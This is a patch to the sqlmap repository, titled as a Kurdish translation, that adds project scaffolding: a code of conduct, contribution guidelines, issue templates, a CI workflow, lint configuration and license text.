Patch for #5798

added kurdish(ckb) translation

.gitattributes

@@ -0,0 +1,27 @@
+*.conf text eol=lf
+*.json text eol=lf
+*.html text eol=lf
+*.md text eol=lf
+*.md5 text eol=lf
+*.pl text eol=lf
+*.py text eol=lf
+*.sh text eol=lf
+*.sql text eol=lf
+*.txt text eol=lf
+*.xml text eol=lf
+*.yaml text eol=lf
+*.yml text eol=lf
+LICENSE text eol=lf
+COMMITMENT text eol=lf
+
+*_ binary
+*.dll binary
+*.pdf binary
+*.so binary
+*.wav binary
+*.zip binary
+*.x32 binary
+*.x64 binary
+*.exe binary
+*.sln binary
+*.vcproj binary

.github/CODE_OF_CONDUCT.md

@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/

.github/CONTRIBUTING.md

@@ -0,0 +1,36 @@
+# Contributing to sqlmap
+
+## Reporting bugs
+
+**Bug reports are welcome**!
+Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).
+
+### Guidelines
+
+* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.
+* Make sure you can reproduce the bug with the latest development version of sqlmap.
+* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.
+* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*
+
+## Submitting code changes
+
+All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
+
+Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
+Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
+
+### Guidelines
+
+In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
+
+* Each patch should make one logical change.
+* Avoid tabbing, use four blank spaces instead.
+* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
+* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
+* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
+* Style that is too different from main branch will be ''adapted'' by the developers side.
+* Do not touch anything inside `thirdparty/` and `extra/` folders.
+
+### Licensing
+
+By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.

.github/FUNDING.yml

@@ -0,0 +1 @@
+github: sqlmapproject

.github/ISSUE_TEMPLATE/bug_report.md

@@ -0,0 +1,37 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug report
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+1. Run '...'
+2. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Running environment:**
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
+
+**Target details:**
+ - DBMS [e.g. Microsoft SQL Server]
+ - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
+ - WAF/IPS [if any]
+ - Relevant console output [if any]
+ - Exception traceback [if any]
+
+**Additional context**
+Add any other context about the problem here.

.github/ISSUE_TEMPLATE/feature_request.md

@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: feature request
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.

.github/workflows/tests.yml

@@ -0,0 +1,28 @@
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    branches: [ master ]
+
+jobs:
+  build:
+    runs-on: ${{ matrix.os }}
+    strategy:
+      matrix:
+        os: [ubuntu-latest, macos-latest, windows-latest]
+        python-version: [ 'pypy-2.7', '3.12' ]
+        exclude:
+          - os: macos-latest
+            python-version: 'pypy-2.7'
+    steps:
+      - uses: actions/checkout@v2
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: ${{ matrix.python-version }}
+      - name: Basic import test
+        run: python -c "import sqlmap; import sqlmapapi"
+      - name: Smoke test
+        run: python sqlmap.py --smoke
+      - name: Vuln test
+        run: python sqlmap.py --vuln

.gitignore

@@ -0,0 +1,8 @@
+output/
+__pycache__/
+*.py[cod]
+.sqlmap_history
+traffic.txt
+*~
+req*.txt
+.idea/

.pylintrc

@@ -0,0 +1,546 @@
+# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker
+
+[MASTER]
+
+# Specify a configuration file.
+#rcfile=
+
+# Python code to execute, usually for sys.path manipulation such as
+# pygtk.require().
+init-hook="from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))"
+
+# Add files or directories to the blacklist. They should be base names, not
+# paths.
+ignore=
+
+# Pickle collected data for later comparisons.
+persistent=no
+
+# List of plugins (as comma separated values of python modules names) to load,
+# usually to register additional checkers.
+load-plugins=
+
+# Use multiple processes to speed up Pylint.
+# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!
+jobs=1
+
+# Allow loading of arbitrary C extensions. Extensions are imported into the
+# active Python interpreter and may run arbitrary code.
+unsafe-load-any-extension=no
+
+# A comma-separated list of package or module names from where C extensions may
+# be loaded. Extensions are loading into the active Python interpreter and may
+# run arbitrary code
+extension-pkg-whitelist=
+
+# Allow optimization of some AST trees. This will activate a peephole AST
+# optimizer, which will apply various small optimizations. For instance, it can
+# be used to obtain the result of joining multiple strings with the addition
+# operator. Joining a lot of strings can lead to a maximum recursion error in
+# Pylint and this flag can prevent that. It has one side effect, the resulting
+# AST will be different than the one from reality.
+optimize-ast=no
+
+
+[MESSAGES CONTROL]
+
+# Only show warnings with the listed confidence levels. Leave empty to show
+# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED
+confidence=
+
+# Enable the message, report, category or checker with the given id(s). You can
+# either give multiple identifier separated by comma (,) or put this option
+# multiple time. See also the "--disable" option for examples.
+disable=all
+
+enable=import-error,
+       import-self,
+       reimported,
+       wildcard-import,
+       misplaced-future,
+       deprecated-module,
+       unpacking-non-sequence,
+       invalid-all-object,
+       undefined-all-variable,
+       used-before-assignment,
+       cell-var-from-loop,
+       global-variable-undefined,
+       redefine-in-handler,
+       unused-import,
+       unused-wildcard-import,
+       global-variable-not-assigned,
+       undefined-loop-variable,
+       global-at-module-level,
+       bad-open-mode,
+       redundant-unittest-assert,
+       boolean-datetime
+       deprecated-method,
+       anomalous-unicode-escape-in-string,
+       anomalous-backslash-in-string,
+       not-in-loop,
+       continue-in-finally,
+       abstract-class-instantiated,
+       star-needs-assignment-target,
+       duplicate-argument-name,
+       return-in-init,
+       too-many-star-expressions,
+       nonlocal-and-global,
+       return-outside-function,
+       return-arg-in-generator,
+       invalid-star-assignment-target,
+       bad-reversed-sequence,
+       nonexistent-operator,
+       yield-outside-function,
+       init-is-generator,
+       nonlocal-without-binding,
+       lost-exception,
+       assert-on-tuple,
+       dangerous-default-value,
+       duplicate-key,
+       useless-else-on-loop
+       expression-not-assigned,
+       confusing-with-statement,
+       unnecessary-lambda,
+       pointless-statement,
+       pointless-string-statement,
+       unnecessary-pass,
+       unreachable,
+       using-constant-test,
+       bad-super-call,
+       missing-super-argument,
+       slots-on-old-class,
+       super-on-old-class,
+       property-on-old-class,
+       not-an-iterable,
+       not-a-mapping,
+       format-needs-mapping,
+       truncated-format-string,
+       missing-format-string-key,
+       mixed-format-string,
+       too-few-format-args,
+       bad-str-strip-call,
+       too-many-format-args,
+       bad-format-character,
+       format-combined-specification,
+       bad-format-string-key,
+       bad-format-string,
+       missing-format-attribute,
+       missing-format-argument-key,
+       unused-format-string-argument
+       unused-format-string-key,
+       invalid-format-index,
+       bad-indentation,
+       mixed-indentation,
+       unnecessary-semicolon,
+       lowercase-l-suffix,
+       invalid-encoded-data,
+       unpacking-in-except,
+       import-star-module-level,
+       long-suffix,
+       old-octal-literal,
+       old-ne-operator,
+       backtick,
+       old-raise-syntax,
+       metaclass-assignment,
+       next-method-called,
+       dict-iter-method,
+       dict-view-method,
+       indexing-exception,
+       raising-string,
+       using-cmp-argument,
+       cmp-method,
+       coerce-method,
+       delslice-method,
+       getslice-method,
+       hex-method,
+       nonzero-method,
+       t-method,
+       setslice-method,
+       old-division,
+       logging-format-truncated,
+       logging-too-few-args,
+       logging-too-many-args,
+       logging-unsupported-format,
+       logging-format-interpolation,
+       invalid-unary-operand-type,
+       unsupported-binary-operation,
+       not-callable,
+       redundant-keyword-arg,
+       assignment-from-no-return,
+       assignment-from-none,
+       not-context-manager,
+       repeated-keyword,
+       missing-kwoa,
+       no-value-for-parameter,
+       invalid-sequence-index,
+       invalid-slice-index,
+       unexpected-keyword-arg,
+       unsupported-membership-test,
+       unsubscriptable-object,
+       access-member-before-definition,
+       method-hidden,
+       assigning-non-slot,
+       duplicate-bases,
+       inconsistent-mro,
+       inherit-non-class,
+       invalid-slots,
+       invalid-slots-object,
+       no-method-argument,
+       no-self-argument,
+       unexpected-special-method-signature,
+       non-iterator-returned,
+       arguments-differ,
+       signature-differs,
+       bad-staticmethod-argument,
+       non-parent-init-called,
+       bad-except-order,
+       catching-non-exception,
+       bad-exception-context,
+       notimplemented-raised,
+       raising-bad-type,
+       raising-non-exception,
+       misplaced-bare-raise,
+       duplicate-except,
+       nonstandard-exception,
+       binary-op-exception,
+       not-async-context-manager,
+       yield-inside-async-function
+
+# Needs investigation:
+# abstract-method (might be indicating a bug? probably not though)
+# protected-access (requires some refactoring)
+# attribute-defined-outside-init (requires some refactoring)
+# super-init-not-called (requires some cleanup)
+
+# Things we'd like to enable someday:
+# redefined-builtin (requires a bunch of work to clean up our code first)
+# redefined-outer-name (requires a bunch of work to clean up our code first)
+# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)
+# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)
+# unused-argument (need to clean up or code a lot, e.g. prefix unused_?)
+# function-redefined (@overload causes lots of spurious warnings)
+# too-many-function-args (@overload causes spurious warnings... I think)
+# parameter-unpacking (needed for eventual Python 3 compat)
+# print-statement (needed for eventual Python 3 compat)
+# filter-builtin-not-iterating (Python 3)
+# map-builtin-not-iterating (Python 3)
+# range-builtin-not-iterating (Python 3)
+# zip-builtin-not-iterating (Python 3)
+# many others relevant to Python 3
+# unused-variable (a little work to cleanup, is all)
+
+# ...
+[REPORTS]
+
+# Set the output format. Available formats are text, parseable, colorized, msvs
+# (visual studio) and html. You can also give a reporter class, eg
+# mypackage.mymodule.MyReporterClass.
+output-format=parseable
+
+# Put messages in a separate file for each module / package specified on the
+# command line instead of printing them on stdout. Reports (if any) will be
+# written in a file name "pylint_global.[txt|html]".
+files-output=no
+
+# Tells whether to display a full report or only the messages
+reports=no
+
+# Python expression which should return a note less than 10 (10 is the highest
+# note). You have access to the variables errors warning, statement which
+# respectively contain the number of errors / warnings messages and the total
+# number of statements analyzed. This is used by the global evaluation report
+# (RP0004).
+evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
+
+# Template used to display messages. This is a python new-style format string
+# used to format the message information. See doc for all details
+#msg-template=
+
+
+[LOGGING]
+
+# Logging modules to check that the string format arguments are in logging
+# function parameter format
+logging-modules=logging
+
+
+[FORMAT]
+
+# Maximum number of characters on a single line.
+max-line-length=100
+
+# Regexp for a line that is allowed to be longer than the limit.
+ignore-long-lines=^\s*(# )?<?https?://\S+>?$
+
+# Allow the body of an if to be on the same line as the test if there is no
+# else.
+single-line-if-stmt=no
+
+# List of optional constructs for which whitespace checking is disabled. `dict-
+# separator` is used to allow tabulation in dicts, etc.: {1  : 1,\n222: 2}.
+# `trailing-comma` allows a space between comma and closing bracket: (a, ).
+# `empty-line` allows space-only lines.
+no-space-check=trailing-comma,dict-separator
+
+# Maximum number of lines in a module
+max-module-lines=1000
+
+# String used as indentation unit. This is usually "    " (4 spaces) or "\t" (1
+# tab).
+indent-string='    '
+
+# Number of spaces of indent required inside a hanging  or continued line.
+indent-after-paren=4
+
+# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
+expected-line-ending-format=
+
+
+[TYPECHECK]
+
+# Tells whether missing members accessed in mixin class should be ignored. A
+# mixin class is detected if its name ends with "mixin" (case insensitive).
+ignore-mixin-members=yes
+
+# List of module names for which member attributes should not be checked
+# (useful for modules/projects where namespaces are manipulated during runtime
+# and thus existing member attributes cannot be deduced by static analysis. It
+# supports qualified module names, as well as Unix pattern matching.
+ignored-modules=thirdparty.six.moves
+
+# List of classes names for which member attributes should not be checked
+# (useful for classes with attributes dynamically set). This supports can work
+# with qualified names.
+ignored-classes=
+
+# List of members which are set dynamically and missed by pylint inference
+# system, and so shouldn't trigger E1101 when accessed. Python regular
+# expressions are accepted.
+generated-members=
+
+
+[VARIABLES]
+
+# Tells whether we should check for unused import in __init__ files.
+init-import=no
+
+# A regular expression matching the name of dummy variables (i.e. expectedly
+# not used).
+dummy-variables-rgx=_$|dummy
+
+# List of additional names supposed to be defined in builtins. Remember that
+# you should avoid to define new builtins when possible.
+additional-builtins=
+
+# List of strings which can identify a callback function by name. A callback
+# name must start or end with one of those strings.
+callbacks=cb_,_cb
+
+
+[SIMILARITIES]
+
+# Minimum lines number of a similarity.
+min-similarity-lines=4
+
+# Ignore comments when computing similarities.
+ignore-comments=yes
+
+# Ignore docstrings when computing similarities.
+ignore-docstrings=yes
+
+# Ignore imports when computing similarities.
+ignore-imports=no
+
+
+[SPELLING]
+
+# Spelling dictionary name. Available dictionaries: none. To make it working
+# install python-enchant package.
+spelling-dict=
+
+# List of comma separated words that should not be checked.
+spelling-ignore-words=
+
+# A path to a file that contains private dictionary; one word per line.
+spelling-private-dict-file=
+
+# Tells whether to store unknown words to indicated private dictionary in
+# --spelling-private-dict-file option instead of raising a message.
+spelling-store-unknown-words=no
+
+
+[MISCELLANEOUS]
+
+# List of note tags to take in consideration, separated by a comma.
+notes=FIXME,XXX,TODO
+
+
+[BASIC]
+
+# List of builtins function names that should not be used, separated by a comma
+bad-functions=map,filter,input
+
+# Good variable names which should always be accepted, separated by a comma
+good-names=i,j,k,ex,Run,_
+
+# Bad variable names which should always be refused, separated by a comma
+bad-names=foo,bar,baz,toto,tutu,tata
+
+# Colon-delimited sets of names that determine each other's naming style when
+# the name regexes allow several styles.
+name-group=
+
+# Include a hint for the correct naming format with invalid-name
+include-naming-hint=no
+
+# Regular expression matching correct function names
+function-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for function names
+function-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct variable names
+variable-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for variable names
+variable-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct constant names
+const-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Naming hint for constant names
+const-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$
+
+# Regular expression matching correct attribute names
+attr-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for attribute names
+attr-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct argument names
+argument-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for argument names
+argument-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression matching correct class attribute names
+class-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Naming hint for class attribute names
+class-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$
+
+# Regular expression matching correct inline iteration names
+inlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$
+
+# Naming hint for inline iteration names
+inlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$
+
+# Regular expression matching correct class names
+class-rgx=[A-Z_][a-zA-Z0-9]+$
+
+# Naming hint for class names
+class-name-hint=[A-Z_][a-zA-Z0-9]+$
+
+# Regular expression matching correct module names
+module-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Naming hint for module names
+module-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$
+
+# Regular expression matching correct method names
+method-rgx=[a-z_][a-z0-9_]{2,30}$
+
+# Naming hint for method names
+method-name-hint=[a-z_][a-z0-9_]{2,30}$
+
+# Regular expression which should only match function or class names that do
+# not require a docstring.
+no-docstring-rgx=^_
+
+# Minimum line length for functions/classes that require docstrings, shorter
+# ones are exempt.
+docstring-min-length=-1
+
+
+[ELIF]
+
+# Maximum number of nested blocks for function / method body
+max-nested-blocks=5
+
+
+[IMPORTS]
+
+# Deprecated modules which should not be used, separated by a comma
+deprecated-modules=regsub,TERMIOS,Bastion,rexec
+
+# Create a graph of every (i.e. internal and external) dependencies in the
+# given file (report RP0402 must not be disabled)
+import-graph=
+
+# Create a graph of external dependencies in the given file (report RP0402 must
+# not be disabled)
+ext-import-graph=
+
+# Create a graph of internal dependencies in the given file (report RP0402 must
+# not be disabled)
+int-import-graph=
+
+
+[DESIGN]
+
+# Maximum number of arguments for function / method
+max-args=5
+
+# Argument names that match this expression will be ignored. Default to name
+# with leading underscore
+ignored-argument-names=_.*
+
+# Maximum number of locals for function / method body
+max-locals=15
+
+# Maximum number of return / yield for function / method body
+max-returns=6
+
+# Maximum number of branch for function / method body
+max-branches=12
+
+# Maximum number of statements in function / method body
+max-statements=50
+
+# Maximum number of parents for a class (see R0901).
+max-parents=7
+
+# Maximum number of attributes for a class (see R0902).
+max-attributes=7
+
+# Minimum number of public methods for a class (see R0903).
+min-public-methods=2
+
+# Maximum number of public methods for a class (see R0904).
+max-public-methods=20
+
+# Maximum number of boolean expressions in a if statement
+max-bool-expr=5
+
+
+[CLASSES]
+
+# List of method names used to declare (i.e. assign) instance attributes.
+defining-attr-methods=__init__,__new__,setUp
+
+# List of valid names for the first argument in a class method.
+valid-classmethod-first-arg=cls
+
+# List of valid names for the first argument in a metaclass class method.
+valid-metaclass-classmethod-first-arg=mcs
+
+# List of member names, which should be excluded from the protected access
+# warning.
+exclude-protected=_asdict,_fields,_replace,_source,_make
+
+
+[EXCEPTIONS]
+
+# Exceptions that will emit a warning when being caught. Defaults to
+# "Exception"
+overgeneral-exceptions=Exception

LICENSE

@@ -1,340 +1,348 @@
-		    GNU GENERAL PUBLIC LICENSE
-		       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-		    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
